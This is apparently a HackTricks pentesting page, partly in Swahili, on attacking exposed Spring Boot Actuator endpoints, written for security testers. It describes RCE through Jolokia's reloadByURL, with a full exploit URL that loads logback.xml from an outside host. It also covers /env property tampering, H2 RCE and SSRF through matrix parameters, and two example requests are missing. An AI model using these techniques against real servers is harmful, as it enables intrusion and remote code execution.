Spring Actuators
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Spring Boot Actuators register endpoints such as /health, /trace, /beans, /env, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only /health and /info are non-sensitive by default, but developers often disable this security.
Baadhi ya endpoints za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
/dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, na /heapdump.
Katika Spring Boot 1.x, actuators zinaregistriwa chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi /actuator/.
Remote Code Execution via '/jolokia':
The /jolokia actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans.
The reloadByURL action can be exploited to reload logging configurations from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML configurations.
Example exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
Config Modification via '/env':
If Spring Cloud Libraries are present, the /env endpoint allows modification of environmental properties.
Properties can be manipulated to exploit vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.
Example exploit POST request:
Other Useful Settings:
Properties like spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, and spring.datasource.tomcat.max-active can be manipulated for various exploits, such as SQL injection or altering database connection strings.
A comprehensive list of default actuators can be found here.
The /env endpoint in Spring Boot 2.x uses JSON format for property modification, but the general concept remains the same.
Env + H2 RCE:
Details on exploiting the combination of /env endpoint and H2 database can be found here.
SSRF on Spring Boot Through Incorrect Pathname Interpretation:
The Spring framework's handling of matrix parameters (;) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
Example exploit request:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
